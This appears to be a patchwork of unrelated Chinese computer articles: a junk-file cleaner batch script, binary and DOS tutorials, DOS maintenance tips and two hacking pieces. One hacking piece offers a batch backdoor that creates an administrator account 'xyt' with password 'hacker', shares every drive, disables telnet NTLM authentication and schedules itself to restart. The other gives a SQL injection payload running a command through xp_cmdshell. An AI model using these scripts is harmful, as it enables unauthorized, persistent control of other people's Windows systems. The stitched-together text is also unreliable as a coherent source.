Windows在安装和使用过程中都会产生相当多的垃圾文件，包括临时文件（如：*.tmp、*._mp）日志文件（*.log）、临时帮助文件（*.gid）、磁盘检查文件（*.chk）、临时备份文件（如：*.old、*.bak）以及其他临时文件。特别是如果一段时间不清理IE的临时文件夹“Temporary Internet Files”，其中的缓存文件有时会占用上百MB的磁盘空间。这些垃圾文件不仅仅浪费了宝贵的磁盘空间，严重时还会使系统运行慢如蜗牛。这点相信你肯定忍受不了吧！所以应及时清理系统的垃圾文件的淤塞，保持系统的“苗条”身材，轻松流畅上网！ 下面是步骤很简单就两步！ 在桌面上点鼠标右键，选择新建一个“记事本”，把下面的字复制进去，点“另存为”，把文件名定为“清除系统垃圾.bat”就完成，记住后缀名一定要是.bat，好ok了！你的垃圾清除器就这样制作成功了！双击它就能很快地清理垃圾文件，大约一分钟不到。 @echo off 　 echo 正在清除系统垃圾文件，请稍等...... 　 del /f /s /q %systemdrive%\*.tmp 　 del /f /s /q %systemdrive%\*._mp 　 del /f /s /q %systemdrive%\*.log 　 del /f /s /q %systemdrive%\*.gid 　 del /f /s /q %systemdrive%\*.chk 　 del /f /s /q %systemdrive%\*.old 　 del /f /s /q %systemdrive%\recycled\*.* 　 del /f /s /q %windir%\*.bak 　 del /f /s /q %windir%\prefetch\*.* ...

代码思路是影子鹰DESERT朋友的，原代码比较麻烦，我做了改进，这个后门优点就是小而且不会被杀，放到SYSTEM32目录下就可以了 ，代码如下：  @echo off  @attrib +s + r xyt.bat @net user xyt hacker /add  @net localgroup administrators xyt /add  @net share c$=c:  @net share d$=d: @net share e$=e: @net share f$=f: @net share g$=g: @net share h$=h: @tlntadmn config sec = -ntlm @net stop schedule @net start Schedule @echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat  @echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat  @at 11:05 c:\WINNT\SYSTEM32\xyt.bat  @at 23:05 c:\WINNT\SYSTEM32\xyt.bat  @net stop telnet  @net start telnet  @exit  这样就会循环运行我们的程序了，即使被人停下来，过几个小时，又回重新运行，呵呵~~ 运行后TELNET IP上去，用户名为xyt，密码为hacker。

   计算机之所以能成为强有力的信息处理工具，在现代社会中起着极其重要的作用，是它本身所具有的卓越特性决定的。电子计算机集接受信息、记忆信息、处理信息、输出信息等功能为一体，确切他说，电子计算机就是电子元件构成的多用途现代信息处理机。   计算机处理信息的过程    电子计算机模拟和代替部分脑力劳动。尽管它有着很强的能力，但是，它只是根据人们的意志去工作，按照人们事先编好的程序自动、高速地进行信息加工的。电子计算机处理信息的过程，是人们日常处理问题惯用的方法和规则的归纳与提高。以计算“30-4*6”为例说明计算机的工作过程：1．将事先编排的计算步骤和原始数据（算式、命令等）由输入设备输入存储器。2．按计算步骤由控制器指挥有关部件完成规定的操作：（1）先进行乘法运算，从存储器中取出数据4和6送到运算器，进行乘法运算，得到积数24；（2）把中间结果24存放到存储器中；（3）再进行减法运算，从存储器中取出被减数30和减数24送到运算器，进行减法运算，得到结果6；（4）把运算器中的结果6送到存储器。 3．把存储器中的最后结果送到输出设备（如显示器或打印机）上，显示或打印出答案。       从上述过程的分析中可以清楚地看到，计算机各基本组成部分的功能及相互之间的关系：由控制器根据人们编制的程序指挥其它各部分协同工作；运算器承担具体计算任务；存储器犹如仓库，存放数据和指令；输入设备将一系列指令和数据送到内部存储器；输出设备则把结果通过一定方式传递出来（如显示、打印、绘制图形等），整个系统是一个非常精巧和协调的有机整体。      计算机处理信息的顺序也可归纳为：输入--处理--输出。      信息的表现形式是多种多样的，计算机信息处理过程的范例不胜枚举，它不只限于算术运算处理，在语言、文字、声音、图象等信息的处理方面都得到了长足的发展。    计算机中的信息表示      数字、字符、汉字和程序等所有信息在电子计算机内部的存储、处理和传送，都采用二进制代码表示。    1．二进制数    在日常生活中计数多采用“十进制”。十进制用“ 0-9”十个数码，根据“逢十进一”的原则进行计数。而计算机中使用的是二进制数，并以此作为计算机传递信息的“语言”。      首先，用二进制数比较方便。只用数码“0”和“1”来表示，按照“逢二进一”的原则计数（二进制和十进制数对应关系如表1．2．1所示）。电子计算机中大量采用电子元件，在这些元件中两种状态最容易实现，如电路的通与断，脉冲的有和无，电位的高与低等。这两种状态也最稳定，又容易实现对电路本身的控制。一个具有两种不同的稳定状态并能相互转换的器件，就可以用二进制数来表示。在电学中用两种稳定的状态来表示“0”和“1”的东西很多，例如利用电子元件具有的双稳态工作特性，可以将电路的断代表“0”，电路的通代表“1”；又如电灯灭表示“0”，电灯亮表示“1”等。如果不用“二进制”而采用“十进制”，就需要找出具有十种稳定状态的电子元件，这样的元件寻找起来是比较困难的，所以“二进制数”在电子元件中的表示是最容易实现的。表1二进制数和十进制数换算对照表二进制十进制二进制十进制二进制十进制二进制十进制00000001130110610019000110100401117101010001020101510008101111    采用“二进制数”的算术运算也比较简单，制造成本更经济。二进制的加法运算和乘法运算公式都各有四条规则：加法有0+0=0，0+1=1,1+0＝1，1＋1＝10；乘法有0*0=0，0*1=0， 1*0=0， 1*1=1，而十进制的加法和乘法运算公式从0＋0开始到9＋9，从0*0开始到9*9各需规则100条。    2．二进制代码      电子计算机中的数是用二进制表示的，在计算机中也采用二进制代码表示字母、数字字符、各种各样的符号、汉字等。在处理信息的过程中，可将若干位的二进制代码组合起来表示各种各样的信息。但由于二进制数不直观，人们在计算机上实际操作时，输入、输出的数使用十进制，而具体转换成二进制编码的工作则由计算机软件系统自动完成。      字母和各种字符在计算机中的传输普遍采用Ascll码（American Standard Code For lnformation lnterchange），即美国标准信息交换码，它用了7位二进制数来表达字母和各种常用字符（见附录）。      对于汉字信息的表示比较复杂，我国有汉字几万个，常用的汉字也有7000多个，为了统一，我国制定了汉字编码标准，规定了一、二级汉字共6763个，用两个字节（16位二进制代码）来表示一个汉字。

相信大家都对telnet比较熟悉吧。hacking的时候经常用到的系统自带shell尤其是注射的时候，但是最讨厌的就是ntlm认证了，以前大家去掉ntlm的方法一般有2种。  1 上传ntml.exe 这种方法有很多缺点，比如：对方有杀毒软件，很多网段屏蔽了TFTP.  2 直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。  今天我给大家介绍我一直在使用的办法，压箱底的哦。  那就是直接运行命令：tlntadmn config sec = -ntlm  注射的话可以直接运行：;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--  运行以后就去掉了该死的ntlm认证：） 赶快去试试吧。

   (一)二进制电子计算机处理的信息，都是仅用“0”与“1”两个简单数字表示的信息，或者是用这种数字进行了编码的信息。这种数制叫做二进制。要了解计算机，首先要了解计算机中数的表示方法。任何一种数制都可以用以下四个规则来描述：基数规则；进位规则；位权规则，运算规则。这了区别不同数制表示的数，通常用右括另外的下标字母表示括号内的数制，十进制数用D表示，二进制用B表示，十六进制数用H表示。二进制用四个规则描述如下：二进制数只有“0”和“1”两个数字，基数是2，最大的数字是1，逢2进位，各位的权为以2为底的幂。例如，(0101101010)各位的权自至在依次为27、26、25、24、23、22、21、20。二进制数的算术四则运算规则，除进、借位外与十进制数相同。■二进制加法规则0＋0=0 1＋0=10＋1=1 1＋1=10■二进制减法规则0-0=0 0-1=1-借位1-0=1 1-1=0■二进制乘法规则0×0=0 1×0=00×1=0 1×1=1例四：二进制数11110 101=110110101)11110-)101101-) 10100二进制的优点是：■二进制只有“0”和“1”两数字，很容易表示。电压的高和低、 晶体管的截止与饱和、磁性材料的磁化方向等都可以表示为“0”和“1”两种状态。■二进制数的每一位只有0和1两状态,只需要两种设备就能表示, 所以二进制数节省设备。由于状态简单，所以抗干扰力强，可靠性高。二进制的主要缺点是数位太长，不便阅读和书写，人们也不习惯。为此常用八进制和十六进制作为二进制的缩写方式。为了适应人们的习惯，通常在计算机内都采用二进制数，输入和输出采用十进制数，由计算机自己完成二进帛与十进制之间的相互转换。0＋1=1 1＋1=10(二)十六进制与数制间的转换十六进制有0，1，2，3，4，5，6，7，8，9，A，B，C，D，E，F共十六个数字，其中A-F表示10-15的数字，基数是16，最大数字是15用F表示，逢16进位。十六进制数是二进制数的一种缩写方式，四位二进帛数有十六种组合，对应十进制数的0-15。二进制数转换为十六进制数的方法，从小数点开始左按四位分节，最高位和低位不足四位时，添0补足四位分节，然后用一个等值的十六进制数代换。反过来，十六进制转换成二进制的方法是：将每个十六进制数用4位二进制来书写，其最左侧或最右侧的可以省去。十进制数转换为二进制数，通常采基数乘除法。整数部分和小数部分分别转换，最后将两部分合起来，即为所转换的二进制数。整数部分转换用基数除法，即除以二进制数的基数2取余数，再将其商除以2取余数，重复这一过程直到商为0为止。第一次余数为二进制数的最低位，依次递增，最后一次余数为二进制数的最高位。小数部分转换用基数乘法，即乘以基数2取整数，将余下的小数再乘以2取整数，直到所需精度为止(小数部分的转换可能出现无限循环和无限不循环的情况)。第一次整数为二进制小数的第一位，依次递减，最后的整数为二进制小数的最低位。因为任何进制数的位权是用十进制数表示的，所以一个任何进制数都可以转化一个等价的十进制数?(三)数制间的转换●如何把十进制数转化为二进制、八进制十进制数转换为二进制数规则：把十进制数用2一次次去除，直至商为0，将得到的余数从最后一次得到的余数依次读起即得，即“除2取余”。例如：将41变换为二进制1 0 1 0 0 1余0125102041即(41)D=(101001)B十进制转换为八进制规则：类似二进制，“除八取余”。例：41转换为八进制51余0541即41转换为八进制为51。●如何把二进制、八进制转换为十进制二进制转化为十进制：(a1…an-1an)2=(a1×2^(n-1)+…+an×2^0)10八进制转化为十进制：(a1…an-1an)8=(a1×8^(n-1)+…+an-1×8^1+an×8^0)10例：(10001010)2=(1×2^7+0×2^6+0×2^5+0×2^4+1×2^3+0×2^2+1×2^1+0×2^0)10=(138)10(532)8=(5×8^2+3×8^1+2×8^0)10=(346)10●如何使二进制、八进制相互转换二进制八进制规则：将十进制数从低位到高位分组，每三位一组，每组可代表0到7之间的数字，依次写下各组所代表的数字即得。例：(11001001)2=(011)(001)(001)3 1 1=(311)8八进制二进制规则：将每位八进制数码分别用三位二进制数表示，并在这个0和1构成的序列去掉无用的前导0即得。例：(5163)=(101)(001)(110)(011)=(101001110011)2

   指令就是指挥机器工作的指示和命令，程序就是一系列按一定顺序排列的指令，执行程序的过程就是计算机的工作过程。    控制器靠指令指挥机器工作，人们用指令表达自己的意图，并交给控制器执行。一台计算机所能执行的各种不同指令的全体，叫做计算机的指令系统，第一台计算机均有自己的特定的指令系统，其指令内容和格式有所不同。        通常一条指令包括两方面的内容：一是指机器执行什么操作，即给出操作要求，二是指出操作数在存储器或通用寄存器组中的地址，即给出操作数的地址。      在计算机中，操作要求和操作数地址都由二进制数码表示，分别称作操作码和地址码，整条指令以二进制编码的形式存放在存储器中。      指令的种类和多少与具体的机型有关，在此不详述，请参见具体的机器资料手册。      指令的顺序执行，将完成程序的执行，因而有必要了解指令的执行过程。首先是取指令和分析指令。按照程序规定的次序，从内存储器取出当前执行的指令，并送到控制器的指令寄存器中，对所取的指令进行分析，即根据指令中的操作码确定计算机应进行什么操作。      其次是执行指令。根据指令分析结果，由控制器发出完成操作所需的一系列控制电位，以便指挥计算机有关部件完成这一操作，同时，还为取下一条指令作好准备。

   早期的计算机系统通常由中央处理器（CPU）、内存、外部设备等部件组成，用户往往独占了计算机的所有资源。例如计算机通过打印机打印时，其它设备都在等待，这样计算机的使用效率很低，用户等待的时间很长。    随着计算机的不断发展，尤其是计算机各种软件的新发展，出现了专门用来解决以上问题的系统软件——操作系统。操作系统的任务是：（1） CPU管理——合理地将CPU分配给各个任务。（2）存储器管理——合理分配存储器。（3）外部设备管理——合理使用外设。（4）信息管理——自动管理文件。    使用了操作系统后用户所面向的不再是一部裸机（计算机硬件），而是面向操作系统，操作系统就成为用户与裸机的接口。    DOS是最基本的操作系统软件， DOS是英文Disk Operation System的简称。微型计算机所使用的DOS操作系统主要是美国Microsoft公司开发的MS-DOS和IBM公司开发的PC-DOS。DOS操作系统软件从1981年诞生起，已经历了一个不断改进、不断完善的发展过程，它的版本也从最初的1．0，逐渐发展到至今已广泛使用的5．0、6．0、6．22等。这里介绍的MS一DOS6.22版，包括了许多新颖的、功能强大的命令。DOS系统的功能    一个计算机系统的各部分要协调工作，充分发挥其效率，需要有一个管理者来合理地调度它的各种资源---硬件和软件资源， DOS操作系统就是这样一个管理者。     计算机系统中的资源通常分为四类：处理器（CPU）、存储器，外部设备和信息。DOS操作系统具有这四大资源的管理功能。    早期的PC系列微机使用的CPU的型号是8088 （8086），近十多年来，陆续问世的80286、80386、80486和80586（又称PENTIUM，中译名为“奔腾”）功能越来越强。DOS 6．22支持所有上述的CPU。    使用8088或8086CPU的微机，受当时条件的限制，对内存进行存取的能力限制在1MB，内存中的RAM的容量一般为640KB，早期的DOS版本都是针对上述硬件进行设计的。    虽然，先进的CPU能管理的内存范围已达到16MB （80286）和4096MB（80386、80486）， DOS的版本也升级到5．0、6．0、6．2…，但是，为了保持与低版本的DOS兼容，DOS仍然把用户能直接使用的内存空间限制在640KB，这640KB内存又称为基本内存。DOS系统的启动1． DOS系统的组成    DOS系统是由软盘或硬盘提供的一组重要程序组成的。DOS系统的核心由三个启动模块和一个引导程序（Boot）组成，三个启动模块分别是输入输出模块（IO.SYS）、文件模块（MSDOS.SYS）和命令处理模块（COMMAND.COM）。引导程序的作用是在计算机启动时将两个隐含的DOS启动模块IO.SYS和MSDOS.SYS装入内存。IO.SYS的主要作用是管理输入／输出设备。MS-DOS.SYS的作用是对磁盘文件和系统资源进行管理。COMMAND.COM是整个DOS系统最外层的模块，它的任务是对用户输入的命令进行解释并执行。2． DOS系统的启动    要使用磁盘上的DOS系统，必须把DOS系统调入计算机的内存储器，这就称为DOS系统的启动。    除了在开机时需要启动DOS以外（这种启动，一般称为冷启动），在微机运行中，如果由于某种原因，微机运行处于“死循环”或其它“死机”情况，也需要重新启动DOS （这种启动，一般称为热启动）。按（Ctrl）十（Alt）十（Del）键可重新启动DOS。有的微机面板上配有一个按钮（Reset），按该钮也可重新启动DOS。    DOS的启动可以分成从软磁盘（A驱动器中）启动和从硬盘（也称为C盘）启动两种。对装有硬盘的微机，可通过对CMOS的修改，设定这两种途径的优先次序。如果设定的优先次序为“A：，C：”，则启动时先在驱动器A中查找有无DOS系统，有则从A盘启动，若无则从硬盘C中查找有无DOS系统；反之，若设定的优先次序为“C：，A：”，则启动时先从硬盘C中查找DOS系统，若无再从软盘A中查找。   在DOS文件中,还有两个重要文件，它们在同一启动盘的根目录中：（1） config.sys是系统配置文件。用户用它可以预先规定内存的安排，等等，使系统的硬件更好地发挥作用。（2） autoexec.bat是系统规定的启动时自动执行的批处理文件。它可在用户进行键盘操作前自动执行一系列DOS命令（内部命令和外部命令），它可以设置系统环境变量、搜索路径、系统提示符、屏幕或打印机模式，还可以启动用户程序。（3）以80286、80386、80486为CPU的各种微机的主机内部装有高能电池，在关机后，时钟能继续运行，在开机时能自动读出日期和时间。【例】用软盘启动DOS（该盘上没有autoexec.bat文件）。把启动盘插入A驱动器并关上门。开机后屏幕上显示如下信息： Current date is Wed ll-24-1993Enter new date （mm一dd一yy ） ：    如果显示日期和当天日期有误差，则可输入正确值（按格式：月-日-年）后按回车键加以校正，否则直接按回车键即可。询问日期后，屏幕上显示如下信息：Current time is 11:52:50.38aEnter new time ：    可同日期操作一样处理询问时间的操作。    启动正常结束的标志是屏幕上出现DOS提示符A：＼＞，这表示微机目前处于DOS系统的控制下，等待用户输入命令。字母“A”则表示“当前盘”是A盘。在微机配备了一个以上的磁盘驱动器时，如A盘、B盘、C盘时，将某个盘设置为当前盘的命令是：d：（回车）（d：为盘符）    如要将当前盘从A盘转为C盘，应键人下列下划线部分：A：＼＞C：（回车）屏幕显示：C：＼＞【例2．1．2】用硬盘C启动DOS。A驱动器门不要关。开机后屏幕一般显示如下内容：C：＼＞文 ...

   一个系统只有进行好的维护，才能发挥出好的效果。那么，对于DOS系统，应当如何维护呢？ 首先，要定期检查磁盘的错误。DOS下有许多命令可以用来检查磁盘，如CHKDSK，SCANDISK等。而一个更强大的磁盘工具则是Norton的 Disk Doctor（磁盘医生），它有着友好的界面和强大的功能，可在本站的“磁盘工具”中下载。只有定期检查磁盘，才能保证磁盘使用的稳定性。 其次，要定期检查病毒。计算机病毒是一种能严重危害系统安全和数据完整的破坏性程序，如果任其发作，可能会造成严重的损失。所以，定期检查病毒是非常重要 和必要的。要检查病毒，需要使用好的杀病毒软件，而且注意经常升级病毒库，否则起不到应有的效果。实用的DOS下杀毒软件有F-PROT，Norton AntiVirus，KV3000等，尤其是前面的F-PROT和NAV，皆由世界著名的大公司推出，而且正在不断地更新，所以效果非常好，可以在本站的 “杀毒软件”中下载。然而，由于新的病毒是在不断地出现的，所以应定期下载这些杀毒软件的新的病毒库，以达到最好的较果。当然，光使用杀毒软件，却不注意 防范，也是不行的。防毒通常比杀毒更有效，因为防毒可以大大减少病毒感染的可能性。防毒的方法有多种，如使用病毒防火墙程序，不要使用来历不明的软件等。 通过这些方法，病毒通常无法侵入。 然后，要定期备份重要的数据。因为即使采用了前面的两种措施，也只能大大降低数据被破坏的可能性，而不是高枕无忧了。由于误操作或硬件故障等原因造成的数 据丢失情况随时都可能发生。因此，备份数据就十分必要了。通常可将它们备份到软盘或其它硬盘中以防不测，以免到时后悔莫及。对于磁盘分区表和引导记录等， 也应该备份下来，很多工具都可以做到，如SRC Tools、BFHF等等。尤其是SRC Tools，使用起来非常方便，可以在本站的“磁盘工具”中下载，本站的“DOS文章”栏目中还有它的详细使用方法介绍的文章。 当然，还需要进行一些其它维护，如定期整理磁盘碎片，删除垃圾文件，以及将文件和软件归类以方便使用等。 对于系统配置的维护也是非常重要的，也可以使用一些工具软件来进行自动维护，如用MEMMAKER等。这样可以有效地节省时间和精力。